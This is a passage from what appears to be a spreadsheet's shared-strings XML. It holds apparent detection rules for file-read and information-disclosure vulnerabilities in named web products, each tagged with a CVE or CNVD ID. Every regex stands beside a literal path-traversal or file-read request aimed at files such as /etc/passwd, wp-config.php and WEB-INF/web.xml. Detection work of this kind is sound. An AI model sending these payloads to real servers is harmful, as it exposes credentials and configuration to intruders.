    <t>/interlib/report/ShowImage?localPath=etc/passwd|/interlib/report/ShowImage?localPath=C:\Windows\system.ini</t>
  </si>
  <si>
    <t>JEEWMS</t>
  </si>
  <si>
    <t>.*?(?:/systemController/showOrDownByurl\.do\?down=&amp;dbPath=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/systemController/showOrDownByurl\.do\?down=&amp;dbPath=\.\./Windows/win\.ini).*</t>
  </si>
  <si>
    <t>/systemController/showOrDownByurl.do?down=&amp;dbPath=../../../../../../etc/passwd|/systemController/showOrDownByurl.do?down=&amp;dbPath=../Windows/win.ini</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_fabrik&amp;task=plugin\.pluginAjax&amp;plugin=image&amp;g=element&amp;method=onAjax_files&amp;folder=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/).*</t>
  </si>
  <si>
    <t>/index.php?option=com_fabrik&amp;task=plugin.pluginAjax&amp;plugin=image&amp;g=element&amp;method=onAjax_files&amp;folder=../../../../../../../../../../../../../../../etc/</t>
  </si>
  <si>
    <t>Karel IP手机web管理平台</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/cgiServer\.exx\?page=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Kavita</t>
  </si>
  <si>
    <t>.*?(?:/api/image/cover-upload\?filename=\.\./appsettings\.json).*</t>
  </si>
  <si>
    <t>/api/image/cover-upload?filename=../appsettings.json</t>
  </si>
  <si>
    <t>Longjing API</t>
  </si>
  <si>
    <t>.*?(?:/api/downloads\?fileName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/api/downloads?fileName=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>MPSec ISG</t>
  </si>
  <si>
    <t>.*?(?:/webui/\?g=sys_dia_data_down&amp;file_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./c:/windows/win\.ini|/webui/\?g=sys_dia_data_down&amp;file_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/webui/?g=sys_dia_data_down&amp;file_name=../../../../../../../../../../../../etc/passwd|/webui/?g=sys_dia_data_down&amp;file_name=../../../../../../../../../../../../c:/windows/win.ini</t>
  </si>
  <si>
    <t>Management Console</t>
  </si>
  <si>
    <t>.*?(?:/Electron/download/windows/\.\..\..\.Httpwebrootconfig\.json|/Electron/download/windows/windowswin\.ini).*</t>
  </si>
  <si>
    <t>/Electron/download/windows/..\..\..\Http\webroot\config.json|/Electron/download/windows/\windows\win.ini</t>
  </si>
  <si>
    <t>NS ASG</t>
  </si>
  <si>
    <t>.*?(?:/admin/cert_download\.php\?file=pqpqpqpq\.txt&amp;certfile=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/admin/cert_download\.php\?file=pqpqpqpq\.txt&amp;certfile=cert_download\.php).*</t>
  </si>
  <si>
    <t>/admin/cert_download.php?file=pqpqpqpq.txt&amp;certfile=../../../../../../../../etc/passwd|/admin/cert_download.php?file=pqpqpqpq.txt&amp;certfile=cert_download.php</t>
  </si>
  <si>
    <t>Oliver Library Server</t>
  </si>
  <si>
    <t>.*?(?:/oliver/FileServlet\?source=serverFile&amp;fileName=c:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/oliver/FileServlet?source=serverFile&amp;fileName=c:/windows/win.ini</t>
  </si>
  <si>
    <t>OrbiTeam BSCW Server</t>
  </si>
  <si>
    <t>.*?(?:/pub/bscw\.cgi/30\?op=theme&amp;style_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/pub/bscw.cgi/30?op=theme&amp;style_name=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Surreal ToDo</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?content=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?content=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Symantec Messaging Gateway</t>
  </si>
  <si>
    <t>.*?(?:/brightmail/servlet/com\.ve\.kavachart\.servlet\.ChartStream\?sn=\.\./\.\./WEB-INF/).*</t>
  </si>
  <si>
    <t>/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/</t>
  </si>
  <si>
    <t>TPShop</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Home/uploadify/fileList\?type=\.\+&amp;path=\.\./\.\./\.\./).*</t>
  </si>
  <si>
    <t>/index.php/Home/uploadify/fileList?type=.+&amp;path=../../../</t>
  </si>
  <si>
    <t>openSIS</t>
  </si>
  <si>
    <t>.*?(?:/opensis/ajax\.php\?modname=misc/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;bypass=Transcripts\.php|/ajax\.php\?modname=misc/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;bypass=Transcripts\.php).*</t>
  </si>
  <si>
    <t>/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&amp;bypass=Transcripts.php|/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&amp;bypass=Transcripts.php</t>
  </si>
  <si>
    <t>yishaadmin</t>
  </si>
  <si>
    <t>.*?(?:/admin/File/DownloadFile\?filePath=wwwroot/\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\.//\.\.\./\./etc/passwd&amp;delete=0).*</t>
  </si>
  <si>
    <t>/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&amp;delete=0</t>
  </si>
  <si>
    <t>.*?(?:/NCFindWeb\?service=IPreAlertConfigService&amp;filename=WEB-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/NCFindWeb?service=IPreAlertConfigService&amp;filename=WEB-INF/web.xml</t>
  </si>
  <si>
    <t>SquirrelMail</t>
  </si>
  <si>
    <t>.*?(?:/src/download\.php\?absolute_dl=true&amp;passed_id=1&amp;passed_ent_id=1&amp;mailbox=/etc/passwd|/src/read_body\.php\?mailbox=/etc/passwd&amp;passed_id=1&amp;).*</t>
  </si>
  <si>
    <t>/src/download.php?absolute_dl=true&amp;passed_id=1&amp;passed_ent_id=1&amp;mailbox=/etc/passwd|/src/read_body.php?mailbox=/etc/passwd&amp;passed_id=1&amp;</t>
  </si>
  <si>
    <t>.*?(?:/eam/vib\?id=/etc/passwd).*</t>
  </si>
  <si>
    <t>/eam/vib?id=/etc/passwd</t>
  </si>
  <si>
    <t>.*?(?:/weaver/ln\.FileDownload\?fpath=\.\./ecology/WEB-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml</t>
  </si>
  <si>
    <t>.*?(?:/weaver/org\.springframework\.web\.servlet\.ResourceServlet\?resource=/WEB-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?jvfrm_spot_get_json&amp;fn=\.\./\.\./wp-config\.php&amp;callback=jQuery).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?jvfrm_spot_get_json&amp;fn=../../wp-config.php&amp;callback=jQuery</t>
  </si>
  <si>
    <t>.*?(?:/mdocs-posts/\?mdocs-img-preview=\.\./\.\./\.\./wp-config\.php|/\?mdocs-img-preview=\.\./\.\./\.\./wp-config\.php).*</t>
  </si>
  <si>
    <t>/?mdocs-img-preview=../../../wp-config.php|/mdocs-posts/?mdocs-img-preview=../../../wp-config.php</t>
  </si>
  <si>
    <t>.*?(?:/\?wpv-image=\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2Fetc%2Fpasswd).*</t>
  </si>
  <si>
    <t>/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</t>
  </si>
  <si>
    <t>Wooyun</t>
  </si>
  <si>
    <t>.*?(?:/NCFindWeb\?service=IPreAlertConfigService&amp;filename=\.\./\.\./ierp/bin/prop\.xml).*</t>
  </si>
  <si>
    <t>/NCFindWeb?service=IPreAlertConfigService&amp;filename=../../ierp/bin/prop.xml</t>
  </si>
  <si>
    <t>AceNet</t>
  </si>
  <si>
    <t>任意文件下载</t>
  </si>
  <si>
    <t>CNVD-2021-41972</t>
  </si>
  <si>
    <t>.*?(?:/view/action/download_file\.php\?filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;savename=.*?\.txt).*</t>
  </si>
  <si>
    <t>/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&amp;savename={{filename}}.txt</t>
  </si>
  <si>
    <t>CNVD-2021-43984</t>
  </si>
  <si>
    <t>.*?(?:/webui/\?g=sys_dia_data_down&amp;file_name=\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/webui/?g=sys_dia_data_down&amp;file_name=../etc/passwd</t>
  </si>
  <si>
    <t>AVCON</t>
  </si>
  <si>
    <t>.*?(?:/download\.action\?filename=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/download.action?filename=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Artica Pandora FMS</t>
  </si>
  <si>
    <t>任意文件读取</t>
  </si>
  <si>
    <t>CVE-2020-8497</t>
  </si>
  <si>
    <t>.*?(?:/pandora_console/attachment/pandora_chat\.log\.json\.txt).*</t>
  </si>
  <si>
    <t>/pandora_console/attachment/pandora_chat.log.json.txt</t>
  </si>
  <si>
    <t>CVE-2020-8982</t>
  </si>
  <si>
    <t>.*?(?:/XmlPeek\.aspx\?dt=.\..\..\..\..\..\.Windowswin\.ini&amp;x=/validate\.ashx\?requri).*</t>
  </si>
  <si>
    <t>/XmlPeek.aspx?dt=............Windowswin.ini&amp;x=/validate.ashx?requri</t>
  </si>
  <si>
    <t>CVE-2022-33901</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=admin_init&amp;log_filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=admin_init&amp;log_filename=../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Lightdash</t>
  </si>
  <si>
    <t>CVE-2023-35844</t>
  </si>
  <si>
    <t>.*?(?:/api/v1/slack/image/slack-image.*?%2Fetc%2Fpasswd).*</t>
  </si>
  <si>
    <t>/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd</t>
  </si>
  <si>
    <t>Adobe ColdFusion</t>
  </si>
  <si>
    <t>CVE-2024-20767</t>
  </si>
  <si>
    <t>.*?(?:/hax/\.\./pms\?module=logging&amp;file_name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;number_of_lines=1000|/hax/\.\.CFIDE/adminapi/_servermanager/servermanager\.cfc\?method=getHeartBeat).*</t>
  </si>
  <si>
    <t>/hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat|/hax/../pms?module=logging&amp;file_name=../../../../../../../../../../../../../../../../../../etc/passwd&amp;number_of_lines=1000</t>
  </si>
  <si>
    <t>Bazarr</t>
  </si>
  <si>
    <t>CVE-2024-40348</t>
  </si>
  <si>
    <t>.*?(?:/api/swaggerui/static/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/login|/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Reposilite</t>
  </si>
  <si>
    <t>CVE-2024-36117</t>
  </si>
  <si>
    <t>.*?(?:/javadoc/.*?/raw/\.\.%5c\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2freposilite\.db).*</t>
  </si>
  <si>
    <t>/javadoc/{{javadoc_path}}/raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db</t>
  </si>
  <si>
    <t>Pichome</t>
  </si>
  <si>
    <t>CVE-2025-1743</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?mod=textviewer&amp;src=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?mod=textviewer&amp;src=file:///etc/passwd</t>
  </si>
  <si>
    <t>HCM Cloud</t>
  </si>
  <si>
    <t>.*?(?:/api/model_report/file/download\?index=/&amp;ext=/etc/passwd).*</t>
  </si>
  <si>
    <t>/api/model_report/file/download?index=/&amp;ext=/etc/passwd</t>
  </si>
  <si>
    <t>IDoc View</t>
  </si>
  <si>
    <t>.*?(?:/doc/upload\?token=testtoken&amp;url=file:///C:/windows/win\.ini&amp;name=.*?\.txt).*</t>
  </si>
  <si>
    <t>/doc/upload?token=testtoken&amp;url=file:///C:/windows/win.ini&amp;name={{file}}.txt</t>
  </si>
  <si>
    <t>Jinhe OA</t>
  </si>
  <si>
    <t>.*?(?:/c6/JHSoft\.Web\.CustomQuery/UploadFileDownLoadnew\.aspx/\?FilePath=\.\./Resource/JHFileConfig\.ini).*</t>
  </si>
  <si>
    <t>/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini</t>
  </si>
  <si>
    <t>Crocus system Service</t>
  </si>
  <si>
    <t>.*?(?:/Service\.do\?Action=Download&amp;Path=C:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/Service.do?Action=Download&amp;Path=C:/windows/win.ini</t>
  </si>
  <si>
    <t>红帆</t>
  </si>
  <si>
    <t>.*?(?:/ioffice/prg/set/iocom/ioFileExport\.aspx\?url=/ioffice/web\.config&amp;filename=.*?\.txt&amp;ContentType=application/octet-stream).*</t>
  </si>
  <si>
    <t>/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&amp;filename={{filename}}.txt&amp;ContentType=application/octet-stream</t>
  </si>
  <si>
    <t>LiveBOS ShowImage</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/feed/ShowImage\.do;\.js\.jsp\?type=&amp;imgName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd </t>
  </si>
  <si>
    <t>/|/feed/ShowImage.do;.js.jsp?type=&amp;imgName=../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Nsfocus</t>
  </si>
  <si>
    <t>.*?(?:/webconf/GetFile/index\?path=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/user/requireLogin).*</t>
  </si>
  <si>
    <t>/user/requireLogin|/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Laravel</t>
  </si>
  <si>
    <t>.*?(?:/laravel-filemanager/download\?working_dir=%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2Fetc%2F&amp;type=&amp;file=passwd).*</t>
  </si>
  <si>
    <t>/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&amp;type=&amp;file=passwd</t>
  </si>
  <si>
    <t>.*?(?:/general/mytable/intel_view/video_file\.php\?MEDIA_DIR=\.\./\.\./\.\./inc/&amp;MEDIA_NAME=oa_config\.php).*</t>
  </si>
  <si>
    <t>/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&amp;MEDIA_NAME=oa_config.php</t>
  </si>
  <si>
    <t>万户</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/download_ftp\.jsp\?path=/\.\./WEB-INF/&amp;name=aaa&amp;FileName=web\.xml).*</t>
  </si>
  <si>
    <t>/defaultroot/download_ftp.jsp?path=/../WEB-INF/&amp;name=aaa&amp;FileName=web.xml</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/download_old\.jsp\?path=\.\.&amp;name=x&amp;FileName=WEB-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/defaultroot/download_old.jsp?path=..&amp;name=x&amp;FileName=WEB-INF/web.xml</t>
  </si>
  <si>
    <t>Ninja Tables</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/wp-admin/admin-ajax\.php\?action=ninja_table_force_download&amp;url=/etc/os-release&amp;ninja_table_public_nonce=.*? </t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=ninja_table_force_download&amp;url=/etc/os-release&amp;ninja_table_public_nonce={{public_nonce}}|/</t>
  </si>
  <si>
    <t>Chanjet TPlus DownloadProxy</t>
  </si>
  <si>
    <t>.*?(?:/tplus/SM/DTS/DownloadProxy\.aspx\?preload=1&amp;Path=\.\./\.\./Web\.Config).*</t>
  </si>
  <si>
    <t>/tplus/SM/DTS/DownloadProxy.aspx?preload=1&amp;Path=../../Web.Config</t>
  </si>
  <si>
    <t>.*?(?:/portal/file\?cmd=getFileLocal&amp;fileid=\.\.%2F\.\.%2F\.\.%2F\.\.%2Fwebapps/nc_web/WEB-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/portal/file?cmd=getFileLocal&amp;fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml</t>
  </si>
  <si>
    <t>YonBIP</t>
  </si>
  <si>
    <t>.*?(?:/iuap-apcom-workbench/ucf-wh/yonbiplogin/\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252F\.\.%252Fetc%252Fpasswd%2500\.png\.js).*</t>
  </si>
  <si>
    <t>/iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js</t>
  </si>
  <si>
    <t>锐捷</t>
  </si>
  <si>
    <t>信息泄露</t>
  </si>
  <si>
    <t>CNVD-2021-17369</t>
  </si>
  <si>
    <t>.*?(?:/web/xml/webuser-auth\.xml).*</t>
  </si>
  <si>
    <t>/web/xml/webuser-auth.xml</t>
  </si>
  <si>
    <t>Atlassian Confluence</t>
  </si>
  <si>
    <t>CVE-2015-8399</t>
  </si>
  <si>
    <t>.*?(?:/spaces/viewdefaultdecorator\.action\?decoratorName).*</t>
  </si>
  <si>
    <t>/spaces/viewdefaultdecorator.action?decoratorName</t>
  </si>
  <si>
    <t>DataTaker DT dEX</t>
  </si>
  <si>
    <t>CVE-2017-11165</t>
  </si>
  <si>
    <t>.*?(?:/services/getFile\.cmd\?userfile=config\.xml).*</t>
  </si>
  <si>
    <t>/services/getFile.cmd?userfile=config.xml</t>
  </si>
  <si>
    <t>CVE-2018-0127</t>
  </si>
  <si>
    <t>.*?(?:/dumpmdm\.cmd).*</t>
  </si>
  <si>
    <t>/dumpmdm.cmd</t>
  </si>
  <si>
    <t>Splunk</t>
  </si>
  <si>
    <t>CVE-2018-11409</t>
  </si>
  <si>
    <t>.*?(?:/en-US/splunkd/__raw/services/server/info/server-info\?output_mode=json|/__raw/services/server/info/server-info\?output_mode=json).*</t>
  </si>
  <si>
    <t>/__raw/services/server/info/server-info?output_mode=json|/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json</t>
  </si>
  <si>
    <t>CVE-2019-1653</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/config\.exp).*</t>
  </si>
  <si>
    <t>/cgi-bin/config.exp</t>
  </si>
  <si>
    <t>Jira</t>
  </si>
  <si>
    <t>CVE-2019-8449</t>
  </si>
  <si>
    <t>.*?(?:/rest/api/latest/groupuserpicker\?query=1&amp;maxResults=50000&amp;showAvatar=true).*</t>
  </si>
  <si>
    <t>/rest/api/latest/groupuserpicker?query=1&amp;maxResults=50000&amp;showAvatar=true</t>
  </si>
  <si>
    <t>Kirona Dynamic Resource Scheduler</t>
  </si>
  <si>
    <t>CVE-2019-17503</t>
  </si>
  <si>
    <t>.*?(?:/osm_tiles/REGISTER\.cmd|/osm/REGISTER\.cmd).*</t>
  </si>
  <si>
    <t>/osm_tiles/REGISTER.cmd|/osm/REGISTER.cmd</t>
  </si>
  <si>
    <t>AfterLogic Aurora and WebMail Pro</t>
  </si>
  <si>
    <t>CVE-2021-26294</t>
  </si>
  <si>
    <t>.*?(?:/dav/server\.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings\.xml).*</t>
  </si>
  <si>
    <t>/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml</t>
  </si>
  <si>
    <t>Akkadian Provisioning Manager</t>
  </si>
  <si>
    <t>CVE-2021-31581</t>
  </si>
  <si>
    <t>.*?(?:/pme/database/pme/phinx\.yml).*</t>
  </si>
  <si>
    <t>/pme/database/pme/phinx.yml</t>
  </si>
  <si>
    <t>Hongdian H</t>
  </si>
  <si>
    <t>CVE-2021-28150</t>
  </si>
  <si>
    <t>.*?(?:/backup2\.cgi).*</t>
  </si>
  <si>
    <t>/backup2.cgi</t>
  </si>
  <si>
    <t>Reolink E Zoom Camera</t>
  </si>
  <si>
    <t>CVE-2021-40150</t>
  </si>
  <si>
    <t>.*?(?:/conf/nginx\.conf).*</t>
  </si>
  <si>
    <t>/conf/nginx.conf</t>
  </si>
  <si>
    <t>CVE-2021-24997</t>
  </si>
  <si>
    <t>.*?(?:/wp-json/guppy/v2/load-guppy-users\?userId=1&amp;offset=0&amp;search=).*</t>
  </si>
  <si>
    <t>/wp-json/guppy/v2/load-guppy-users?userId=1&amp;offset=0&amp;search=</t>
  </si>
  <si>
    <t>CVE-2021-24146</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin\.php\?page=MEC-ix&amp;tab=MEC-export&amp;mec-ix-action=export-events&amp;format=csv).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=MEC-ix&amp;tab=MEC-export&amp;mec-ix-action=export-events&amp;format=csv</t>
  </si>
  <si>
    <t>AmetysCMS</t>
  </si>
  <si>
    <t>CVE-2022-26159</t>
  </si>
  <si>
    <t>.*?(?:/plugins/web/service/search/auto-completion/domain/en\.xml\?q=adm).*</t>
  </si>
  <si>
    <t>/plugins/web/service/search/auto-completion/domain/en.xml?q=adm</t>
  </si>
  <si>
    <t>Wavlink WL</t>
  </si>
  <si>
    <t>CVE-2022-48164</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/ExportLogs\.sh).*</t>
  </si>
  <si>
    <t>/cgi-bin/ExportLogs.sh</t>
  </si>
  <si>
    <t>CVE-2022-2376</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=directorist_author_pagination).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=directorist_author_pagination</t>
  </si>
  <si>
    <t>CVE-2022-0594</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=shareaholic_debug_info).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=shareaholic_debug_info</t>
  </si>
  <si>
    <t>Adlisting Classified Ads</t>
  </si>
  <si>
    <t>CVE-2023-4168</t>
  </si>
  <si>
    <t>.*?(?:/ad-list-search\?keyword=&amp;lat=&amp;long=&amp;long=&amp;lat=&amp;location=&amp;category=&amp;keyword=).*</t>
  </si>
  <si>
    <t>/ad-list-search?keyword=&amp;lat=&amp;long=&amp;long=&amp;lat=&amp;location=&amp;category=&amp;keyword=</t>
  </si>
  <si>
    <t>EyouCMS</t>
  </si>
  <si>
    <t>CVE-2023-37645</t>
  </si>
  <si>
    <t>.*?(?:/data/model/custom_model_path/recruit\.filelist\.txt).*</t>
  </si>
  <si>
    <t>/data/model/custom_model_path/recruit.filelist.txt</t>
  </si>
  <si>
    <t>Milesight Routers</t>
  </si>
  <si>
    <t>CVE-2023-43261</t>
  </si>
  <si>
    <t>.*?(?:/lang/log/httpd\.log).*</t>
  </si>
  <si>
    <t>/lang/log/httpd.log</t>
  </si>
  <si>
    <t>CVE-2023-2766</t>
  </si>
  <si>
    <t>.*?(?:/building/backmgr/urlpage/mobileurl/configfile/jx2_config\.ini).*</t>
  </si>
  <si>
    <t>/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini</t>
  </si>
  <si>
    <t>CVE-2023-48241</t>
  </si>
  <si>
    <t>.*?(?:/xwiki/bin/get/XWiki/SuggestSolrService\?outputSyntax=plain&amp;media=json&amp;nb=1000&amp;query=q%3D\*%3A\*%0Aq\.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C\+reference%2C\+links%2C\+doccontentraw_%2C\+objcontent__&amp;input=\+|/bin/get/XWiki/SuggestSolrService\?outputSyntax=plain&amp;media=json&amp;nb=1000&amp;query=q%3D\*%3A\*%0Aq\.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C\+reference%2C\+links%2C\+doccontentraw_%2C\+objcontent__&amp;input=\+).*|.*?(?:/xwiki/bin/view/Main/Search\?r=1&amp;text=propertyvalue%3A%3F\*%20AND%20reference%3A\*\.password&amp;f_locale=en&amp;f_locale=|/bin/view/Main/Search\?r=1&amp;text=propertyvalue%3A%3F\*%20AND%20reference%3A\*\.password&amp;f_locale=en&amp;f_locale=).*</t>
  </si>
  <si>
    <t>/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&amp;media=json&amp;nb=1000&amp;query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&amp;input=+|/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&amp;media=json&amp;nb=1000&amp;query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&amp;input=+|/xwiki/bin/view/Main/Search?r=1&amp;text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&amp;f_locale=en&amp;f_locale=|/bin/view/Main/Search?r=1&amp;text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&amp;f_locale=en&amp;f_locale=</t>
  </si>
  <si>
    <t>Brother MFC</t>
  </si>
  <si>
    <t>CVE-2024-51977</t>
  </si>
  <si>
    <t>.*?(?:/etc/mnt_info\.csv).*</t>
  </si>
  <si>
    <t>/etc/mnt_info.csv</t>
  </si>
  <si>
    <t>Netgear R</t>
  </si>
  <si>
    <t>CVE-2024-30569</t>
  </si>
  <si>
    <t>.*?(?:/currentsetting\.htm).*\|.*?(?:/debuginfo\.htm).*</t>
  </si>
  <si>
    <t>/currentsetting.htm\|/debuginfo.htm</t>
  </si>
  <si>
    <t>iTop Hub Connector</t>
  </si>
  <si>
    <t>CVE-2024-32870</t>
  </si>
  <si>
    <t>.*?(?:/pages/exec\.php\?exec_module=itop-hub-connector&amp;exec_page=launch\.php&amp;target=inform_after_setup).*</t>
  </si>
  <si>
    <t>/pages/exec.php?exec_module=itop-hub-connector&amp;exec_page=launch.php&amp;target=inform_after_setup</t>
  </si>
  <si>
    <t xml:space="preserve">Phinx </t>
  </si>
  <si>
    <t>.*?(?:/phinx\.yml).*</t>
  </si>
  <si>
    <t>/phinx.yml</t>
  </si>
  <si>
    <t xml:space="preserve">Psalm </t>
  </si>
  <si>
    <t>.*?(?:/psalm\.xml).*</t>
  </si>
  <si>
    <t>/psalm.xml</t>
  </si>
  <si>
    <t xml:space="preserve">BitBucket Pipelines </t>
  </si>
  <si>
    <t>.*?(?:/bitbucket-pipelines\.yml).*</t>
  </si>
  <si>
    <t>/bitbucket-pipelines.yml</t>
  </si>
  <si>
    <t>.*?(?:/api/portalTsLogin/utils/getE9DevelopAllNameValue2\?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties).*</t>
  </si>
  <si>
    <t>/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties</t>
  </si>
  <si>
    <t>Nacos</t>
  </si>
  <si>
    <t>.*?(?:/v1/cs/configs\?export=true&amp;group=&amp;tenant=&amp;appName=&amp;ids=&amp;dataId=).*</t>
  </si>
  <si>
    <t>/v1/cs/configs?export=true&amp;group=&amp;tenant=&amp;appName=&amp;ids=&amp;dataId=</t>
  </si>
  <si>
    <t>BSPHP</t>
  </si>
  <si>
    <t>.*?(?:/admin/index\.php\?m=admin&amp;c=log&amp;a=table_json&amp;json=get&amp;soso_ok=1&amp;t=user_login_log&amp;page=1&amp;limit=10&amp;bsphptime=1600407394176&amp;soso_id=1&amp;soso=&amp;DESC=0).*</t>
  </si>
  <si>
